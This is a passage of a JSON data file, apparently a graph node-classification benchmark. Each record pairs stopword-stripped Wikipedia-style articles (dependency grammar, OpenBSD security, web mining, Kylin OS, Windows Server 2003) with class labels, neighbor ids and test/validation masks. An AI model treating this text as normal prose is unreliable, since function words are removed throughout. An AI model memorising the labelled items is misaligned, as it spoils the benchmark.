    "text": "Dependency_grammar:dependency grammar dependency grammar dg class modern grammatical theories based dependency relation opposed relation phrase structure traced back primarily work lucien tesnière dependency notion linguistic units e.g words connected directed links finite verb taken structural center clause structure syntactic units words either directly indirectly connected verb terms directed links called dependencies dgs distinct phrase structure grammars since dgs lack phrasal nodes although acknowledge phrases structure determined relation word head dependents dependency structures flatter phrase structures part lack finite verb phrase constituent thus well suited analysis languages free word order czech slovak warlpiri notion dependencies grammatical units existed since earliest recorded grammars e.g pāṇini dependency concept therefore arguably predates phrase structure many centuries ibn maḍāʾ 12th-century linguist córdoba andalusia may first grammarian use term dependency grammatical sense use today early modern times dependency concept seems coexisted side side phrase structure latter entered latin french english grammars widespread study term logic antiquity dependency also concretely present works sámuel brassai 1800–1897 hungarian linguist 1830-1894 german philologist heimann hariton tiktin 1850–1936 romanian linguist modern dependency grammars however begin primarily work lucien tesnière tesnière frenchman polyglot professor linguistics universities strasbourg montpellier major work éléments de syntaxe structurale published posthumously 1959 – died 1954 basic approach syntax developed seems seized upon independently others 1960s number dependency-based grammars gained prominence since early works dg generated lot interest germany theoretical syntax language pedagogy recent years great development surrounding dependency-based theories come computational linguistics due part influential work david hays machine translation rand corporation 1950s 1960s dependency-based systems increasingly used parse natural language generate tree banks interest dependency grammar growing present international conferences dependency linguistics relatively recent development depling 2011 depling 2013 depling 2015 depling 2017 depling 2019 dependency one-to-one correspondence every element e.g word morph sentence exactly one node structure sentence corresponds element result one-to-one correspondence dependency grammars word morph grammars exist elements dependencies connect elements structure situation compared phrase structure phrase structure one-to-one-or-more correspondence means every element sentence one nodes structure correspond element result difference dependency structures minimal compared phrase structure counterparts since tend contain many fewer nodes trees illustrate two possible ways render dependency phrase structure relations see dependency tree ordered tree i.e reflects actual word order many dependency trees abstract away linear order focus hierarchical order means show actual word order constituency phrase structure tree follows conventions bare phrase structure bps whereby words employed node labels distinction dependency phrase structure grammars derives large part initial division clause phrase structure relation derives initial binary division whereby clause split subject noun phrase np predicate verb phrase vp division certainly present basic analysis clause find works instance leonard bloomfield noam chomsky tesnière however argued vehemently binary division preferring instead position verb root clause structure tesnière stance subject-predicate division stems term logic place linguistics importance distinction one acknowledges initial subject-predicate division syntax real one likely go path phrase structure grammar one rejects division one must consider verb root structure go path dependency grammar following frameworks dependency-based link grammar similar dependency grammar link grammar include directionality linked words thus describe head-dependent relationships hybrid dependency/phrase structure grammar uses dependencies words also includes dependencies phrasal nodes – see example quranic arabic dependency treebank derivation trees tree-adjoining grammar dependency structures although full trees tag rendered terms phrase structure regard clear whether tag viewed dependency phrase structure grammar major differences grammars listed regard dependency relation compatible major tenets theories grammar thus like phrase structure grammars dependency grammars mono- multistratal representational derivational construction- rule-based various conventions dgs employ represent dependencies following schemata addition tree trees illustrate conventions representations a–d trees whereby specific conventions employed tree vary solid lines dependency edges lightly dotted lines projection lines difference tree tree b tree employs category class label nodes whereas tree b employs words node labels tree c reduced tree insofar string words projection lines deemed unnecessary hence omitted tree abstracts away linear order reflects hierarchical order arrow arcs e alternative convention used show dependencies favored word grammar brackets f seldom used nevertheless quite capable reflecting dependency hierarchy dependents appear enclosed brackets heads finally indentations like g another convention sometimes employed indicate hierarchy words dependents placed underneath heads indented like tree indentations g abstract away linear order point conventions namely conventions influence basic commitment dependency relation grouping syntactic units dependency representations show syntactic dependencies indeed work dependency grammar focuses syntactic dependencies syntactic dependencies however one three four types dependencies meaning–text theory instance emphasizes role semantic morphological dependencies addition syntactic dependencies fourth type prosodic dependencies also acknowledged distinguishing types dependencies important part one fails likelihood semantic morphological and/or prosodic dependencies mistaken syntactic dependencies great following four subsections briefly sketch dependency types discussion existence syntactic dependencies taken granted used orientation point establishing nature three dependency types semantic dependencies understood terms predicates arguments arguments predicate semantically dependent predicate often semantic dependencies overlap point direction syntactic dependencies times however semantic dependencies point opposite direction syntactic dependencies entirely independent syntactic dependencies hierarchy words following examples show standard syntactic dependencies whereas arrows indicate semantic dependencies two arguments sam sally tree dependent predicate likes whereby arguments also syntactically dependent likes means semantic syntactic dependencies overlap point direction tree attributive adjectives however predicates take head noun argument hence big predicate tree b takes bones one argument semantic dependency points tree therefore runs counter syntactic dependency similar situation obtains c preposition predicate takes two arguments picture wall one semantic dependencies points syntactic hierarchy whereas points finally predicate help takes one argument jim directly connected jim syntactic hierarchy means semantic dependency entirely independent syntactic dependencies morphological dependencies obtain words parts words given word part word influences form another word latter morphologically dependent former agreement concord therefore manifestations morphological dependencies like semantic dependencies morphological dependencies overlap point direction syntactic dependencies overlap point opposite direction syntactic dependencies entirely independent syntactic dependencies arrows used indicate morphological dependencies plural houses demands plural demonstrative determiner hence appears means morphological dependency points hierarchy houses situation reversed b singular subject sam demands appearance agreement suffix -s finite verb works means morphological dependency pointing hierarchy sam works type determiner german examples c influences inflectional suffix appears adjective alt indefinite article ein used strong masculine ending -er appears adjective definite article der used contrast weak ending -e appears adjective thus since choice determiner impacts morphological form adjective morphological dependency pointing determiner adjective whereby morphological dependency entirely independent syntactic dependencies consider following french sentences masculine subject le chien demands masculine form predicative adjective blanc whereas feminine subject la maison demands feminine form adjective morphological dependency entirely independent syntactic dependencies therefore points across syntactic hierarchy morphological dependencies play important role typological studies languages classified mostly head-marking sam work-s mostly dependent-marking houses whereby languages contain least minor measure head dependent marking prosodic dependencies acknowledged order accommodate behavior clitics clitic syntactically autonomous element prosodically dependent host clitic therefore integrated prosody host meaning forms single word host prosodic dependencies exist entirely linear dimension horizontal dimension whereas standard syntactic dependencies exist hierarchical dimension vertical dimension classic examples clitics english reduced auxiliaries e.g -ll -s -ve possessive marker -s prosodic dependencies following examples indicated hyphen lack vertical projection line hyphens lack projection lines indicate prosodic dependencies hyphen appears left clitic indicates clitic prosodically dependent word immediately left 'll whereas hyphen appears right side clitic shown indicates clitic prosodically dependent word appears immediately right given clitic often prosodically dependent syntactic dependent 'll head would 've times depend prosodically word neither head immediate dependent florida syntactic dependencies focus work dg stated presence direction syntactic dependencies determined course often open debate regard must acknowledged validity syntactic dependencies trees throughout article taken granted however hierarchies many dgs largely support although certainly points disagreement basic question syntactic dependencies discerned proven difficult answer definitively one acknowledge area however basic task identifying discerning presence direction syntactic dependencies dgs easier harder determining constituent groupings phrase structure grammars variety heuristics employed end basic tests constituents useful tools syntactic dependencies assumed trees article grouping words together manner closely matches results standard permutation substitution ellipsis tests constituents etymological considerations also provide helpful clues direction dependencies promising principle upon base existence syntactic dependencies distribution one striving identify root given phrase word responsible determining distribution phrase whole root traditionally dgs different approach linear order word order phrase structure grammars dependency structures minimal compared phrase structure counterparts minimal structures allow one focus intently two ordering dimensions separating vertical dimension hierarchical order horizontal dimension linear order easily accomplished aspect dependency structures allowed dgs starting tesnière 1959 focus hierarchical order manner hardly possible phrase structure grammars tesnière linear order secondary hierarchical order insofar hierarchical order preceded linear order mind speaker stemmas trees tesnière produced reflected view abstracted away linear order focus almost entirely hierarchical order many dgs followed tesnière adopted practice produced tree structures reflect hierarchical order alone e.g traditional focus hierarchical order generated impression dgs little say linear order contributed view dgs particularly well-suited examine languages free word order negative result focus hierarchical order however dearth dg explorations particular word order phenomena standard discontinuities comprehensive dependency grammar accounts topicalization wh -fronting scrambling extraposition mostly absent many established dg frameworks situation contrasted phrase structure grammars devoted tremendous effort exploring phenomena nature dependency relation however prevent one focusing linear order dependency structures capable exploring word order phenomena phrase structures following trees illustrate point represent one way exploring discontinuities using dependency structures trees suggest manner common discontinuities addressed example german used illustrate scrambling discontinuity a-trees left show projectivity violations crossing lines b-trees right demonstrate one means addressing violations displaced constituent takes word head governor words red mark catena =chain words extends root displaced constituent governor constituent discontinuities explored terms catenae limitations topicalization wh -fronting scrambling extraposition explored identified examining nature catenae involved traditionally dgs treated syntactic functions grammatical functions grammatical relations primitive posit inventory functions e.g subject object oblique determiner attribute predicative etc. functions appear labels dependencies tree structures e.g syntactic functions tree shown green attr attribute comp-p complement preposition comp-to complement det determiner p-attr prepositional attribute pred predicative subj subject to-comp complement functions chosen abbreviations used tree merely representative general stance dgs toward syntactic functions actual inventory functions designations employed vary dg dg primitive theory status functions much different phrase structure grammars traditionally phrase structure grammars derive syntactic functions constellation instance object identified np appearing inside finite vp subject np appearing outside finite vp since dgs reject existence finite vp constituent never presented option view syntactic functions manner issue question comes first traditionally dgs take syntactic functions primitive derive constellation functions whereas phrase structure grammars traditionally take constellation primitive derive syntactic functions constellation question comes first functions constellation inflexible matter stances grammar types dependency phrase structure narrowly limited traditional views dependency phrase structure fully compatible approaches syntactic functions indeed monostratal systems based dependency phrase structure likely reject notion functions derived constellation constellation derived functions take primitive means neither derived",
    "neighbors": [
      1890,
      3078,
      5478,
      5161,
      8297,
      10890,
      2316,
      10577,
      10610,
      1044,
      5399
    ],
    "mask": "Test"
  },
  {
    "node_id": 4071,
    "label": 2,
    "text": "OpenBSD_security_features:openbsd security features openbsd operating system focuses security development security features according author michael w. lucas openbsd widely regarded secure operating system available anywhere licensing terms bugs security flaws often caused programmer error common source error misuse codice_1 codice_2 string functions c programming language two common alternatives codice_3 codice_4 difficult understand easy misuse openbsd developers todd c. miller theo de raadt designed codice_5 codice_6 functions functions intended make harder programmers accidentally leave buffers unterminated allow overflowed adopted netbsd freebsd projects gnu c library openbsd linker changed issue warning unsafe string manipulation functions codice_1 codice_2 codice_9 found occurrences functions openbsd source tree replaced addition static bounds checker included openbsd attempt find common programming mistakes compile time security-related apis developed openbsd project include codice_10 codice_11 june 2017 email theo de raadt stated problem stable systems could running months time although considerable randomization within kernel key addresses remains project progress modifies linker every boot kernel relinked well randomizations differs kernel aslr email states result every new kernel unique relative offsets functions data unique ... current change scaffolding ensure boot newly-linked kernel upon every reboot ... new random kernel linked together ... fast machine takes less second ... reboot runs new kernel yet another kernel built next boot internal deltas functions inside kernel attacker expects 'll need better info leaks openbsd integrates several technologies help protect operating system attacks buffer overflows integer overflows developed hiroaki etoh propolice gcc extension designed protect applications stack-smashing attacks number operations local stack variables reordered place buffers pointers protecting corruption case buffer overflow pointers function arguments also placed local buffers canary value placed local buffers function exits sometimes used detect buffer overflows propolice chooses whether protect buffer based automatic heuristics judge vulnerable reducing performance overhead protection integrated openbsd version gcc december 2002 first made available openbsd 3.3 applied kernel release 3.4 extension works cpu architectures supported openbsd enabled default c code compiled protected without user intervention may 2004 openbsd sparc platform received stack protection form stackghost makes use features sparc architecture help prevent exploitation buffer overflows support sparc64 added march 2005 openbsd 3.4 introduced w^x memory management scheme ensure memory either writable executable never provides another layer protection buffer overflows relatively easy implement platform like x86-64 hardware support nx bit openbsd one oses support generic i386 platform lacks built per-page execute controls development cycle 3.8 release changes made codice_12 memory management functions traditional unix operating systems codice_12 allocates memory extending unix data segment practice made difficult implement strong protection security problems codice_12 implementation openbsd makes use codice_15 system call modified returns random memory addresses ensures different areas mapped next addition allocation small blocks shared areas randomized codice_16 function changed return memory kernel immediately rather leaving mapped process number additional optional checks also added aid development features make program bugs easier detect harder exploit instead memory corrupted invalid access ignored often result segmentation fault abortion process brought light several issues software running openbsd 3.8 particularly programs reading beyond start end buffer type bug would previously detected directly cause error abilities took three years implement without considerable performance loss one goals openbsd project integration facilities software strong cryptography core operating system end number low-level features provided including source strong pseudo random numbers built-in cryptographic hash functions transforms support cryptographic hardware openbsd cryptographic framework abilities used throughout openbsd including bcrypt password-hashing algorithm derived bruce schneier blowfish block cipher takes advantage cpu-intensive blowfish key schedule making brute-force attacks less practical protect sensitive information passwords leaking disk persist many years openbsd supports encryption swap partition swap space split many small regions assigned encryption key soon data region longer required openbsd securely deletes discarding encryption key feature enabled default openbsd 3.9 later network stack also makes heavy use randomization increase security reduce predictability various values may use attacker including tcp initial sequence numbers timestamps ephemeral source ports number features increase network resilience availability including countermeasures problems icmp software redundancy carp pfsync also included project first disable plain-text telnet daemon favor encrypted ssh daemon 1999 features integrated cryptographic software ipsec telnet daemon completely removed openbsd 2005 release openbsd version 3.8 parts x11 openbsd running user except x server split privilege-stripped x process run root x process run _x11 user x11 openbsd neither x server x clients normally escalated direct memory hardware privileges driving x intel 4 radeon 4 drivers normally interact underlying hardware via direct rendering management 4 kernel interface lowlevel memory/hardware access handled solely kernel drivers wsfb follow similar pattern reason x11 openbsd open lowlevel memory hardware access user/root programs done systems done past needed user escalate machdep.allowaperture setting default zero setting unsecure setting openbsd version x window system named xenocara security modifications server default applications patched make use privilege separation openbsd provides aperture driver limit x access memory however work x security flaws loïc duflot theo de raadt commented aperture driver merely best x violates security models hear university class went castigate x developers taking time solving 10-year-old problem november 29 2006 vesa kernel driver developed permitted x run albeit slowly without use aperture driver february 15 2014 x modified allow run without root privileges discovery security vulnerability x openbsd n't support running x root user supports running x via display manager dedicated codice_17 user privilege separation privilege revocation chrooting randomized loading libraries also play role increasing security system many applied openbsd versions common programs tcpdump apache bsd authentication system openbsd history providing users full disclosure relation various bugs security breaches detected openbsd team exemplified project slogan two remote holes default install heck long time openbsd 5.3 support full disk encryption introduced openbsd 5.8 introduced codice_18 system call restricting process capabilities minimal subset required correct operation process compromised attempts perform unintended behavior terminated kernel since introduction applications ports changed support codice_18 including chromium web browser",
    "neighbors": [
      9223,
      6664,
      2825,
      3465,
      10631,
      1932,
      274,
      3603,
      4117,
      7702,
      8725,
      8344,
      10105,
      5402,
      3742,
      1315,
      10924,
      174,
      6702,
      7983,
      8368,
      9520,
      7734,
      1474,
      2245,
      1993,
      8778,
      3404,
      11086,
      4562,
      5970,
      7252,
      5084,
      8671,
      6754,
      7139,
      1637,
      6888,
      11112,
      5356,
      5230,
      7794,
      11634,
      2292,
      1399,
      1785,
      8954,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4072,
    "label": 8,
    "text": "Web_mining:web mining web mining application data mining techniques discover patterns world wide web name proposes information gathered mining web makes utilization automated apparatuses reveal extricate data servers web2 reports permits organizations get organized unstructured information browser activities server logs website link structure page content different sources goal web structure mining generate structural summary web site web page technically web content mining mainly focuses structure inner-document web structure mining tries discover link structure hyperlinks inter-document level based topology hyperlinks web structure mining categorize web pages generate information similarity relationship different web sites web structure mining also another direction -- discovering structure web document type structure mining used reveal structure schema web pages would good navigation purpose make possible compare/integrate web page schemes type structure mining facilitate introducing database techniques accessing information web pages providing reference schema web mining divided three different types – web usage mining web content mining web structure mining web usage mining application data mining techniques discover interesting usage patterns web data order understand better serve needs web-based applications usage data captures identity origin web users along browsing behavior web site web usage mining classified depending kind usage data considered studies related work concerned two areas constraint-based data mining algorithms applied web usage mining developed software tools systems costa seco demonstrated web log mining used extract semantic information hyponymy relationships particular user given community web usage mining essentially many advantages makes technology attractive corporations including government agencies technology enabled e-commerce personalized marketing eventually results higher trade volumes government agencies using technology classify threats fight terrorism predicting capability mining applications benefit society identifying criminal activities companies establish better customer relationship understanding needs customer better reacting customer needs faster companies find attract retain customers save production costs utilizing acquired insight customer requirements increase profitability target pricing based profiles created even find customers might default competitor company try retain customer providing promotional offers specific customer thus reducing risk losing customer customers benefits web usage mining particularly area personalization outlined specific frameworks probabilistic latent semantic analysis model offer additional features user behavior access pattern process provides user relevant content collaborative recommendation models also demonstrate capability web usage mining technology address problems associated traditional techniques biases questions regarding validity since data patterns obtained subjective degrade time also elements unique web usage mining show technology benefits include way semantic knowledge applied interpreting analyzing reasoning usage patterns mining phase web usage mining create issues technology used data personal nature might cause concerns criticized ethical issue involving web usage mining invasion privacy privacy considered lost information concerning individual obtained used disseminated especially occurs without knowledge consent obtained data analyzed clustered form profiles data made anonymous clustering personal profiles thus applications de-individualize users judging mouse clicks de-individualization defined tendency judging treating people basis group characteristics instead individual characteristics merits another important concern companies collecting data specific purpose might use data totally different purposes essentially violates user ’ interests growing trend selling personal data commodity encourages website owners trade personal data obtained site trend increased amount data captured traded increasing likeliness one ’ privacy invaded companies buy data obliged make anonymous companies considered authors specific release mining patterns legally responsible contents release inaccuracies release result serious lawsuits law preventing trading data mining algorithms might use controversial attributes like sex race religion sexual orientation categorize individuals practices might anti-discrimination legislation applications make hard identify use controversial attributes strong rule usage algorithms attributes process could result denial service privilege individual based race religion sexual orientation right situation avoided high ethical standards maintained data mining company collected data made anonymous obtained data obtained patterns traced back individual might look poses threat one ’ privacy however additional information inferred application combining two separate unscrupulous data user web structure mining uses graph theory analyze node connection structure web site according type web structural data web structure mining divided two kinds web structure mining terminology techniques web structure mining web content mining mining extraction integration useful data information knowledge web page content heterogeneity lack structure permits much ever-expanding information sources world wide web hypertext documents makes automated discovery organization search indexing tools internet world wide web lycos alta vista webcrawler aliweb metacrawler others provide comfort users generally provide structural information categorize filter interpret documents factors prompted researchers develop intelligent tools information retrieval intelligent web agents well extend database data mining techniques provide higher level organization semi-structured data available web agent-based approach web mining involves development sophisticated ai systems act autonomously semi-autonomously behalf particular user discover organize web-based information web content mining differentiated two different points view information retrieval view database view summarized research works done unstructured data semi-structured data information retrieval view shows researches use bag words based statistics single words isolation represent unstructured text take single word found training corpus features semi-structured data works utilize html structures inside documents utilized hyperlink structure documents document representation database view order better information management querying web mining always tries infer structure web site transform web site become database several ways represent documents vector space model typically used documents constitute whole vector space representation realize importance words document resolve tf-idf term frequency times inverse document frequency introduced multi-scanning document implement feature selection condition category result rarely affected extraction feature subset needed general algorithm construct evaluating function evaluate features feature set information gain cross entropy mutual information odds ratio usually used classifier pattern analysis methods text data mining similar traditional data mining techniques usual evaluative merits classification accuracy precision recall information score web mining important component content pipeline web portals used data confirmation validity verification data integrity building taxonomies content management content generation opinion mining language code chinese words complicated compared english gb big5 hz code common chinese word codes web documents text mining one needs identify code standard html documents transform inner code use data mining techniques find useful knowledge useful patterns",
    "neighbors": [
      225,
      8705,
      7780,
      2440,
      3433,
      6576,
      10577,
      3858,
      1044,
      119,
      8440,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 4073,
    "label": 2,
    "text": "Kylin_(operating_system):kylin operating system kylin operating system developed academics national university defense technology people republic china since 2001 named mythical beast qilin first versions based freebsd intended use chinese military government organizations version 3.0 kylin became linux-based version called neokylin announced 2010 separate project using ubuntu linux operating system announced 2013 first version ubuntu kylin released april 2013 development kylin began 2001 national university defense technology assigned mission developing operating system 863 program intended make china independent foreign technology aim support several kinds server platforms achieve high performance high availability high security well conforming international standards unix linux operating systems created using hierarchy model including basic kernel layer similar mach system service layer similar bsd desktop environment similar windows designed comply unix standards compatible linux applications february 2006 china military online website sponsored pla daily chinese people liberation army reported successful development kylin server operating system said first 64-bit operating system high security level b2 class also first operating system without linux kernel obtained linux global standard authentification international free standards group april 2006 said kylin operating system largely copied freebsd 5.3 anonymous chinese student australia used pseudonym dancefire carried kernel similarity analysis showed similarities two operating systems reached 99.45 percent one kylin developers confirmed kylin based freebsd speech international conference eurobsdcon 2006 2009 report presented us-china economic security review commission stated purpose kylin make chinese computers impenetrable competing countries cyberwarfare arena washington post reported china developed secure operating software tens millions computers already installing government military systems hoping make beijing ’ networks impenetrable u.s. military intelligence agencies deployment kylin said hardened key chinese servers advent version 3.0 kylin used linux kernel december 2010 announced china standard software national university defense technology signed strategic partnership launch version called neokylin china standard software maker neoshine linux desktop series neokylin intended use government offices national defense energy sectors chinese economy 2014 bloomberg news reported northeastern city siping migrated computers microsoft windows neokylin part government effort shift computer technology chinese suppliers september 2015 us computer maker dell reported 42 personal computers sold china running neokylin operating system tianhe-1 supercomputer 64-bit kylin linux oriented high-performance parallel computing optimization supports power management high-performance virtual computing newer tianhe-2 also uses kylin linux 2013 canonical reached agreement ministry industry information technology people republic china release ubuntu-based linux os features targeted chinese market ubuntu kylin described loose continuation china kylin os intended desktop laptop computers first official release ubuntu kylin 13.04 25 april 2013",
    "neighbors": [
      7425,
      2180,
      1400,
      1927,
      1801,
      7561,
      10761,
      6797,
      274,
      5397,
      9625,
      1946,
      4636,
      10780,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11698,
      11573,
      1718,
      823,
      9784,
      1465,
      5177,
      5819,
      7483,
      3006,
      9151,
      11459,
      9927,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      1891,
      998,
      8816,
      2545,
      3058,
      5363,
      5492,
      2421,
      7027,
      9201,
      2424,
      1273,
      9844,
      11506,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 4074,
    "label": 3,
    "text": "Windows_Server_2003:windows server 2003 windows server 2003 server operating system produced microsoft released april 24 2003 successor windows 2000 server predecessor windows server 2008 updated version windows server 2003 r2 released manufacturing december 6 2005 windows server 2003 kernel later adopted development windows vista windows server 2003 follow-up windows 2000 server incorporating compatibility features windows xp unlike windows 2000 server windows server 2003 default installation none server components enabled reduce attack surface new machines windows server 2003 includes compatibility modes allow older applications run greater stability made compatible windows nt 4.0 domain-based networking windows server 2003 brought enhanced active directory compatibility better deployment support ease transition windows nt 4.0 windows server 2003 windows xp professional product went several name changes course development first announced 2000 known codename whistler server named windows 2002 server brief time mid-2001 followed windows .net server windows .net server 2003 microsoft chose focus .net branding .net framework os finally released windows server 2003 windows server 2003 first microsoft windows version thoroughly subjected semi-automated testing bugs software system called prefast developed computer scientist amitabh srivastava microsoft research automated bug checking system first tested windows 2000 thoroughly amitabh srivastava prefast found 12 windows server 2003 bugs remaining 88 found human computer programmers microsoft employs 4,700 programmers work windows 60 software testers whose job find bugs windows source code microsoft co-founder bill gates stated windows server 2003 microsoft rigorously tested software date microsoft later used windows server 2003 kernel development windows vista following features new windows server 2003 ability create rescue disk removed favor automated system recovery asr windows server 2003 comes number editions targeted towards particular size type business general variants windows server 2003 ability share files printers act application server host message queues provide email services authenticate users act x.509 certificate server provide ldap directory services serve streaming media perform server-oriented functions windows server 2003 web meant building hosting web applications web pages xml web services designed used primarily iis web server provides platform developing deploying xml web services applications use asp.net technology domain controller terminal services functionality included web edition however remote desktop administration available 10 concurrent file-sharing connections allowed moment possible install microsoft sql server microsoft exchange software edition without installing service pack 1 despite supporting xml web services asp.net uddi deployed windows server 2003 web .net framework version 2.0 included windows server 2003 web installed separate update windows update windows server 2003 web supports maximum 2 physical processors maximum 2 gb ram edition windows server 2003 require client access license cal used internet facing server front-end internet information services windows server update services using storage back-end another remote server front-end cals may still required microsoft windows server 2003 standard aimed towards small medium-sized businesses standard edition supports file printer sharing offers secure internet connectivity allows centralized desktop application deployment specialized version x64 architecture released april 2005 ia-32 version supports four physical processors 4 gb ram x64 version capable addressing 32 gb ram also supports non-uniform memory access windows server 2003 enterprise aimed towards medium large businesses full-function server operating system supports 8 physical processors provides enterprise-class features eight-node clustering using microsoft cluster server mscs software support 64 gb ram pae enterprise edition also comes specialized versions x64 itanium architectures service pack 2 installed x64 itanium versions capable addressing 1 tb 2 tb ram respectively edition also supports non-uniform memory access numa also provides ability hot-add supported hardware windows server 2003 enterprise also required edition issue custom certificate templates windows server 2003 datacenter designed infrastructures demanding high security reliability windows server 2003 available ia-32 itanium x64 processors supports maximum 32 physical processors ia-32 platform 64 physical processors x64 ia-64 hardware ia-32 versions edition support 64 gb ram service pack 2 installed x64 versions support 1 tb ia-64 versions support 2 tb ram windows server 2003 datacenter also allows limiting processor memory usage per-application basis edition better support storage area networks sans features service uses windows sockets emulate tcp/ip communication native san service providers thereby allowing san accessed tcp/ip channel application communicate tcp/ip use san without modification application datacenter edition like enterprise edition supports 8-node clustering clustering increases availability fault tolerance server installations distributing replicating service among many servers edition supports clustering cluster dedicated storage cluster nodes connected common san windows compute cluster server 2003 ccs released june 2006 designed high-end applications require high performance computing clusters designed deployed numerous computers clustered together achieve supercomputing speeds compute cluster server network comprises least one controlling head node subordinate processing nodes carry work compute cluster server uses microsoft messaging passing interface v2 ms-mpi communicate processing nodes cluster network ties nodes together powerful inter-process communication mechanism complex communications hundreds even thousands processors working parallel application programming interface consists 160 functions job launcher enables users execute jobs executed computing cluster ms mpi designed compatible reference open source mpi2 specification widely used high-performance computing hpc exceptions security considerations ms mpi covers complete set mpi2 functionality implemented mpich2 except planned future features dynamic process spawn publishing windows storage server 2003 part windows server 2003 series specialized server operating system network-attached storage nas launched 2003 storage decisions chicago optimized use file print sharing also storage area network san scenarios available original equipment manufacturers oems unlike windows server 2003 editions provide file printer sharing functionality windows storage server 2003 require cal windows storage server 2003 nas equipment headless means without monitors keyboards mice administered remotely devices plugged existing ip network storage capacity available users windows storage server 2003 use raid arrays provide data redundancy fault-tolerance high performance multiple nas servers clustered appear single device allows responsibility serving clients shared way one server fails servers take often termed failover also improves fault-tolerance windows storage server 2003 also used create storage area network data transferred terms chunks rather files thus providing granularity data transferred provides higher performance database transaction processing applications windows storage server 2003 also allows nas devices connected san windows storage server 2003 r2 follow-up windows storage server 2003 adds file-server performance optimization single instance storage sis index-based search single instance storage sis scans storage volumes duplicate files moves duplicate files common sis store file volume replaced link file substitution reduces amount storage space required much 70 windows storage server 2003 r2 provides index-based full-text search based indexing engine already built windows server updated search engine speeds indexed searches network shares edition also provides filters searching many standard file formats .zip autocad xml mp3 .pdf microsoft office file formats windows storage server 2003 r2 includes built support windows sharepoint services microsoft sharepoint portal server adds storage management snap-in microsoft management console used manage storage volumes centrally including dfs shares servers running windows storage server r2 windows storage server 2003 r2 used iscsi target standard enterprise editions windows storage server 2003 r2 incorporating wintarget iscsi technology microsoft acquired 2006 stringbean software add-on feature available purchase oem partners iscsi feature pack included versions wss configured oems windows storage server 2003 promoted function domain controller however edition licensed run directory services joined existing domain member server windows storage server 2003 r2 available following editions windows unified data storage server version windows storage server 2003 r2 iscsi target support standard available standard enterprise editions windows small business server sbs software suite includes windows server additional technologies aimed providing small business complete technology solution standard edition sbs includes microsoft remote web workplace windows sharepoint services microsoft exchange server fax server active directory basic firewall dhcp server network address translation capabilities premium edition sbs adds microsoft sql server 2000 microsoft isa server 2004 sbs type cal different costs slightly cals editions windows server 2003 however sbs cal encompasses user cals windows server exchange server sql server isa server hence less expensive buying cals individually sbs following design limitations mainly affecting active directory remove limitations instance sbs upgrade regular windows server exchange server sql isa server windows small business server 2003 r2 transition pack windows home server operating system microsoft based windows small business server 2003 sp2 seen directory listings installation dvd windows home server announced january 7 2007 consumer electronics show bill gates intended solution homes multiple connected pcs offer file sharing automated backups remote access windows home server began shipment oems september 15 2007 windows server 2003 embedded systems replaced windows 2000 server embedded systems intended use building firewall vpn caching servers similar appliances versions available server appliance software microsoft internet security acceleration server availability original version ended may 28 2003 availability r2 ended march 5 2006 end support scheduled july 14 2015 r2 original end licence scheduled may 28 2018 r2 original end support date indicates supported service pack dated july 14 2005 end licence date last date oem may distribute systems using version versions continue receive critical security updates end support microsoft announced extended support dates windows server 2003 embedded systems release 2 embedded systems available 32 64 bit versions standard 1-4 cpu enterprise 1-8 cpu march 30 2005 microsoft released service pack 1 windows server 2003 among improvements many updates provided windows xp users service pack 2 features added service pack 1 include full list updates available microsoft knowledge base service pack 2 windows server 2003 released march 13 2007 release date originally scheduled first half 2006 june 13 2006 microsoft made initial test version service pack 2 available microsoft connect users build number 2721 followed build 2805 known beta 2 refresh final build 3790 microsoft described service pack 2 standard service pack release containing previously released security updates hotfixes reliability performance improvements addition service pack 2 contains microsoft management console 3.0 windows deployment services replaces remote installation services support wpa2 improvements ipsec msconfig service pack 2 also adds windows server 2003 scalable networking pack snp allows hardware acceleration processing network packets thereby enabling faster throughput snp previously available out-of-band update windows server 2003 service pack 1 windows server 2003 r2 title complementary offering microsoft consists copy windows server 2003 sp1 one cd host optionally installed new features reminiscent microsoft plus another released manufacturing december 6 2005 ia-32 x64 platforms ia-64 succeeded windows server 2008 new features windows server 2003 r2 include july 13 2010 windows server 2003 mainstream support expired extended support phase began extended support phase microsoft continued provide security updates however free technical support warranty claims design changes longer offered extended support lasted july 14 2015 although windows server 2003 unsupported microsoft released emergency security patch may 2017 os well unsupported versions windows including windows xp windows 8 rtm address vulnerability leveraged wannacry ransomware attack",
    "neighbors": [
      2051,
      10243,
      6150,
      10257,
      6675,
      5652,
      11283,
      9757,
      7713,
      8227,
      6692,
      1573,
      3109,
      7207,
      9764,
      5673,
      6697,
      11301,
      1581,
      9780,
      5176,
      582,
      1098,
      4174,
      597,
      9813,
      10839,
      8281,
      9819,
      10332,
      8798,
      608,
      2656,
      10338,
      8296,
      5225,
      10344,
      8299,
      6768,
      4210,
      7796,
      1656,
      6265,
      8315,
      636,
      639,
      641,
      7810,
      2179,
      8834,
      651,
      3723,
      6797,
      4240,
      2193,
      10896,
      2196,
      10908,
      3742,
      9375,
      4771,
      1703,
      3751,
      3752,
      5293,
      9902,
      7343,
      10414,
      3250,
      9910,
      7351,
      7863,
      700,
      7875,
      2244,
      5830,
      200,
      6345,
      4298,
      8904,
      10957,
      5327,
      8404,
      214,
      3289,
      4316,
      224,
      736,
      9448,
      10473,
      5356,
      5357,
      238,
      10989,
      5363,
      10489,
      3834,
      2299,
      6396,
      5380,
      2309,
      3339,
      8976,
      3857,
      2322,
      11030,
      5401,
      7962,
      1820,
      9505,
      292,
      10020,
      8998,
      6441,
      7983,
      4401,
      3890,
      11570,
      6972,
      6462,
      321,
      10051,
      1348,
      2379,
      1365,
      2901,
      2391,
      4438,
      4439,
      11605,
      10079,
      5472,
      11103,
      7523,
      2919,
      9593,
      3450,
      2943,
      8576,
      10624,
      8067,
      3463,
      1418,
      2443,
      6028,
      8080,
      7057,
      5523,
      10132,
      11667,
      1942,
      5526,
      6550,
      4505,
      3482,
      4506,
      412,
      8094,
      929,
      4515,
      8103,
      3496,
      4010,
      6062,
      11184,
      2996,
      9655,
      440,
      953,
      1978,
      5048,
      6584,
      6078,
      3007,
      7615,
      1474,
      7106,
      1480,
      9173,
      5078,
      6614,
      1498,
      7134,
      479,
      5600,
      8159,
      8161,
      9694,
      8167,
      3053,
      9709,
      5103,
      3573,
      3064,
      10747,
      2556,
      5119
